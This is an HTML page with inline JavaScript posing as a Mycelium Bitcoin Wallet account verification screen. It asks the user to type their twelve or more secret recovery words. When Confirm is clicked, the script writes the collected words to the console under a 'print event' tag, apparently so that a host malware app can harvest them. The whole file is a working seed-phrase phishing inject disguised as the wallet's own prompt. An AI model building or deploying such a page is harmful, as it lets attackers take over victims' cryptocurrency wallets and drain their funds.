<!DOCTYPE html>
<html>
<head>
	<title>Mycelium Bitcoin Wallet</title>
	<meta charset="UTF-8">
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body class="bg-main" scroll="no" style="overflow: hidden">
	<main>
		<header class="bold">
			Mycelium Wallet
		</header>
		<p>Please, verify Your account in security purposes.</p>
		<p>Enter the secret words each on new line:</p>
		<textarea rows="12" id="seed"></textarea>
	</main>
	<footer>
		<button type="button" class="bold" id="next" disabled="disabled">Confirm</button>
	</footer>
</body>
<script type="text/javascript">
	const nextButton = document.getElementById('next');
	const seedTextarea = document.getElementById('seed');
	seedTextarea.value = '';
	seedTextarea.addEventListener('keyup', function () {
		if (isValidSeed(this.value)) {
			nextButton.disabled = false;
		} else {
			nextButton.disabled = true;
		}
	});
	nextButton.addEventListener('click', function () {
		console.log('print event: ' + normalizeLog(seedTextarea.value));
	});
	function isValidSeed(value) {
		return countOfLines(value) >= 12;
	}
	function countOfLines(input) {
		return input.split(' ').join('').split('\n').filter(function(val) {return val.trim() !== '';}).length;
	}
	function normalizeLog(input) {
		return input.split(' ').join('').split('\n').filter(function(val) {return val.trim() !== '';}).join(', ');
	}
</script>
</html>